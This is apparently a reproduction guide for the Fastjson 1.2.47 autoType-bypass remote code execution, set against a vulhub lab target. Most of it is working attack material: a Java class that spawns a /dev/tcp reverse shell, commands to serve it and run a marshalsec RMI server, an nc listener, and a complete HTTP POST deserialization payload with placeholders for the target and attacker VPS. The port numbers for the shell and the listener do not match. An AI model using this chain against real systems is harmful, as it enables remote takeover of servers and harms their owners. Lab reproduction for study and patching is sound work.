Fastjson 1.2.47 lets an attacker bypass the autoType check even when autoTypeSupport is off: a first object typed as java.lang.Class makes Fastjson load the class named in its "val" and cache it in TypeUtils.mappings, and a second object whose @type names that same class is then resolved from the cache before the denylist is consulted. The class used here is com.sun.rowset.JdbcRowSetImpl, whose dataSourceName setter performs a JNDI lookup. For the RMI variant below the remote class is only fetched when the target JDK still trusts remote codebases, i.e. com.sun.jndi.rmi.object.trustURLCodebase is true, which is the default only on JDKs older than 8u121. For a detailed analysis, see
https://www.freebuf.com/vuls/208339.html
Prerequisites (to avoid common pitfalls)
Before reproducing this vulnerability, it is best to reproduce the Fastjson 1.2.24 deserialization RCE first, because the two reproduction procedures are very similar.
1. Use Java 1.8 on the attacking machine, otherwise some of the commands will not compile or run, and a class file compiled by a newer JDK will not load on the target (check with java -version).
2. All tools and compiled files must be in the same directory, because the HTTP server started later serves Exploit.class from there:
marshalsec-0.0.3-SNAPSHOT-all.jar
Exploit.java
Exploit.class
Environment setup
https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
After the build finishes, the target is reachable at http://ip:8090.
Reproduction references
https://www.cnblogs.com/websecyw/p/11905014.html
https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
1. Get the exploit
git clone https://github.com/CaijiOrz/fastjson-1.2.47-RCE
This exploit is simply a class whose constructor spawns a reverse shell:
public class Exploit {
    public Exploit() {
        try {
            // Runtime.exec(String) splits on whitespace and does not go through a shell,
            // so the "$@|bash 0 echo ..." trick is used to get the redirections evaluated by bash.
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] argv) {
        Exploit e = new Exploit();
    }
}
2. vim Exploit.java and change 127.0.0.1/8888 to your VPS IP and the port you will listen on
3. javac Exploit.java to compile it into a class file
4. python -m SimpleHTTPServer 4444 to serve Exploit.class over HTTP (python3 -m http.server 4444 on Python 3)
5. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vpsIP:4444/#Exploit" 9999 starts an RMI server on port 9999 that answers the lookup with a Reference pointing at http://vpsIP:4444/Exploit.class
6. Listen with nc -lvnp 7777 (the port must match the one compiled into Exploit.java)
7. Send the PoC and the reverse shell connects back
The full request is given below; replace targetIP and vpsIP:9999 with your own values when you use it, and recompute Content-Length if you edit the body. The order of the two keys matters: "a" must be parsed first so that the class is already cached when "b" is resolved.
POST / HTTP/1.1
Host: targetIP
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 264

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://vpsIP:9999/Exploit",
        "autoCommit":true
    }
}
8. The reverse shell connects back to the nc listener.